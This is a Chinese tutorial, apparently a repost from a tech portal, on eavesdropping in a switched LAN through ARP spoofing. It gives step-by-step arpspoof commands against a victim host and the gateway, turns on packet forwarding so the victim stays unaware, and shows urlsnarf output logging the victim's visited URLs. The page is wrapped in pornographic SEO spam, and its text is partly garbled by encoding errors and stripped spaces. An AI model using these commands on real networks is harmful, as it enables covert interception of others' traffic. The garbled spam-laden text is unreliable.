成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

對交換環(huán)境下Sniffer的闡述

企業(yè)動態(tài)
我們今天主要向大家講述的是交換環(huán)境下的Sniffer,以及對在交換環(huán)境中使用NetXray或者NAISniffer一類的嗅探工具除去抓到自己的包以外的相關(guān)內(nèi)容講述。

此文章主要向大家描述的是交換環(huán)境下的Sniffer,通常在局域網(wǎng)環(huán)境中,我們都是通過交換環(huán)境的網(wǎng)關(guān)上網(wǎng)的,在交換環(huán)境中使用NetXray或者NAISniffer一類的嗅探工具除了抓到自己的包以外,是不能看到其他主機的網(wǎng)絡(luò)通信的。

通常在局域網(wǎng)環(huán)境中,我們都是通過交換環(huán)境的網(wǎng)關(guān)上網(wǎng)的,在交換環(huán)境中使用NetXray或者NAISniffer一類的嗅探工具除了抓到自己的包以外,是不能看到其他主機的網(wǎng)絡(luò)通信的。

 

但是我們可以通過利用ARP欺騙可以實現(xiàn)Sniffer的目的。

ARP協(xié)議是將IP解析為MAC地址的協(xié)議,局域網(wǎng)中的通信都是基于MAC的。

例如下面這樣的情況:

在局域網(wǎng)中192.168.0.24和192.168.0.29都是通過網(wǎng)關(guān)192.168.0.1上網(wǎng)的,假定攻擊者的系統(tǒng)為192.168.0.24,他希望聽到192.168.0.29的通信,那么我們就可以利用ARP欺騙實現(xiàn)。

1、首先告訴192.168.0.29,網(wǎng)關(guān)192.168.0.1的MAC地址是192.168.0.24

2、告訴192.168.0.1,192.168.0.29的MAC地址是192.168.0.24。

這樣192.168.0.29和192.168.0.1之間的數(shù)據(jù)包,就會發(fā)給192.168.0.24,也就是攻擊者的機器,這樣就可以聽到會話了。但是這么做的有一個問題,192.168.0.29發(fā)現(xiàn)自己不能上網(wǎng)了,因為原來發(fā)給192.168.0.1的數(shù)據(jù)包都被192.168.0.24接收了,而并沒有發(fā)給網(wǎng)關(guān)192.168.0.1。

這時候192.168.0.24設(shè)置一個包轉(zhuǎn)發(fā)的東西就可以解決這個問題了,也就是從192.168.0.29收到的包轉(zhuǎn)發(fā)給192.168.0.1,在把從192.168.0.1收到的包發(fā)給192.168.0.29。這樣192.168.0.29根本就不會意識到自己被監(jiān)聽了。

具體實現(xiàn):

1、欺騙192.168.0.29,告訴這臺機器網(wǎng)關(guān)192.168.0.1的MAC地址是自己(192.168.0.24)。

[root@Linuxdsniff-2.3]#./arpspoof-ieth0-t192.168.0.29192.168.0.1

0:50:56:40:7:710:0:86:61:6b:4e080642:arpreply192.168.0.1is-at0:50:56:40:7:71

0:50:56:40:7:710:0:86:61:6b:4e080642:arpreply192.168.0.1is-at0:50:56:40:7:71

0:50:56:40:7:710:0:86:61:6b:4e080642:arpreply192.168.0.1is-at0:50:56:40:7:71

0:50:56:40:7:710:0:86:61:6b:4e080642:arpreply192.168.0.1is-at0:50:56:40:7:71

0:0:21:0:0:180:0:86:61:6b:4e080642:arpreply192.168.0.1is-at0:0:21:0:0:18

………………………………..

這時候?qū)?92.168.0.29的ARP欺騙就開始了。

2、欺騙192.168.0.1,告訴網(wǎng)關(guān)192.168.0.29的MAC地址是自己(192.168.0.24)。

[root@Linuxdsniff-2.3]#./arpspoof-ieth0-t192.168.0.1192.168.0.29

0:50:56:40:7:710:0:21:0:0:18080642:arpreply192.168.0.29is-at0:50:56:40:7:71

0:50:56:40:7:710:0:21:0:0:18080642:arpreply192.168.0.29is-at0:50:56:40:7:71

0:50:56:40:7:710:0:21:0:0:18080642:arpreply192.168.0.29is-at0:50:56:40:7:71

0:0:86:61:6b:4e0:0:21:0:0:18080642:arpreply192.168.0.29is-at0:0:86:61:6b:4e

0:0:86:61:6b:4e0:0:21:0:0:18080642:arpreply192.168.0.29is-at0:0:86:61:6b:4e

0:0:86:61:6b:4e0:0:21:0:0:18080642:arpreply192.168.0.29is-at0:0:86:61:6b:4e

其實在這個時候192.168.0.29是可以發(fā)現(xiàn)的自己被欺騙了。在CMD下面使用ARP–a命令:

C:\WINNT>arp-a

Interface:192.168.0.29onInterface0x1000003

InternetAddressPhysicalAddressType

192.168.0.100-50-56-40-07-71dynamic

192.168.0.2400-50-56-40-07-71dynamic

兩個IP地址的MAC地址居然是一模一樣的!不過很少有人會這么做:-)。

3、設(shè)置一個包轉(zhuǎn)發(fā)

[root@Linuxfragrouter-1.6]#./fragrouter-B1

fragrouter:base-1:normalIPforwarding

在這之前別忘了首先需要打開包轉(zhuǎn)發(fā)的功能

[root@Linux/proc]#echo1>/proc/sys/net/ipv4/ip_forward

萬事具備,可以開始SNIFFER了。

例如想看看192.168.0.29在瀏覽什么地方:

[root@Linuxdsniff-2.3]#./urlsnarf

urlsnarf:listeningoneth0[tcpport80orport8080orport3128]

Kitty[18/May/2002:20:02:25+1100]"GEThttp://pub72.ezboard.com/flasile15596frm1.showAddReplyScreenFromWeb?topicID=29.topic&index=7HTTP/1.1"--"http://www.google.com/search?hl=zh-CN&ie=UTF8&oe=UTF8&q=fdfds&btnG=Google%E6%90%9C%E7%B4%A2&lr=""Mozilla/4.0(compatible;MSIE6.0;WindowsNT5.0)"

Kitty--[18/May/2002:20:02:28+1100]"GEThttp://www.ezboard.com/ztyles/default.cssHTTP/1.1"--"http://pub72.ezboard.com/flasile15596frm1.showAddReplyScreenFromWeb?topicID=29.topic&index=7""Mozilla/4.0(compatible;MSIE6.0;WindowsNT5.0)"

Kitty--[18/May/2002:20:02:29+1100]"GEThttp://www1.ezboard.com/spch.js?customerid=1147458082HTTP/1.1"--"http://pub72.ezboard.com/flasile15596frm1.showAddReplyScreenFromWeb?topicID=29.topic&index=7""Mozilla/4.0(compatible;MSIE6.0;WindowsNT5.0)"

當(dāng)然也可以知道其他………:-)

以上的相關(guān)內(nèi)容就是對交換環(huán)境下的Sniffer 的介紹,望你能有所收獲。

【編輯推薦】

  1. 網(wǎng)絡(luò)嗅探教程:使用Sniffer Pro監(jiān)控ARP協(xié)議欺騙
  2. 教你使用Anti ARP Sniffer查找ARP攻擊者
  3. 網(wǎng)絡(luò)嗅探教程:使用Sniffer Pro監(jiān)控網(wǎng)絡(luò)流量
  4. 用Sniffer和ARP分析網(wǎng)絡(luò)問題
  5. 使用Sniffer截獲流經(jīng)本機網(wǎng)卡的IP數(shù)據(jù)包
責(zé)任編輯:佚名 來源: 中國IT實驗室
相關(guān)推薦

2010-10-09 10:05:05

2010-10-09 09:05:58

2009-12-01 18:41:08

SUSE Linux

2010-07-19 14:17:47

SQL Server內(nèi)

2010-03-22 17:44:18

核心交換機

2010-10-09 17:02:13

2010-04-02 10:12:07

無線交換機管理優(yōu)勢

2010-08-06 13:20:00

DB2鎖等待

2010-03-16 15:24:15

四層交換機

2010-03-18 17:01:52

Cisco交換機

2010-01-12 18:00:30

Visual C++

2010-08-02 11:38:43

DB2外部文件格式

2010-10-09 14:38:40

2021-06-29 12:10:48

CentOSMySQL工具

2009-12-01 11:01:39

交叉編譯環(huán)境構(gòu)建

2009-06-24 08:46:16

2010-03-18 16:47:31

以太網(wǎng)交換機

2010-01-11 09:28:34

C++編程

2010-03-11 09:40:11

管理型交換機

2009-09-08 09:30:00

點贊
收藏

51CTO技術(shù)棧公眾號

主站蜘蛛池模板: 国产精品久久一区二区三区 | 观看av| 亚洲午夜av| 国产精品久久久久免费 | 色综合激情 | 日日草天天干 | 亚洲精品电影网在线观看 | 国产精品久久久久无码av | 国产三区视频在线观看 | 中文字幕日韩一区二区 | 午夜专区 | 国产精品亚洲精品日韩已方 | 欧美一区二区在线播放 | 色婷婷综合在线观看 | 国产日韩精品一区二区三区 | 亚洲黄色高清视频 | 免费观看毛片 | 久久精品毛片 | 亚洲免费在线观看视频 | 亚洲国产成人久久综合一区,久久久国产99 | 天天草天天爱 | 日韩在线视频一区 | 久久久久久久av麻豆果冻 | 蜜桃在线视频 | 久久99久久98精品免观看软件 | av在线免费播放 | 国产成年人小视频 | 在线不卡视频 | 中文在线视频 | 一区二区在线 | 欧美日韩在线免费 | 亚洲精品乱码久久久久久久久久 | 久久久无码精品亚洲日韩按摩 | 国产日产久久高清欧美一区 | 欧美成人免费在线 | 成人性生交a做片 | 国产精品99久久久久久宅男 | 日韩在线综合网 | 18性欧美 | 精品国产乱码久久久久久蜜柚 | 午夜激情影院 |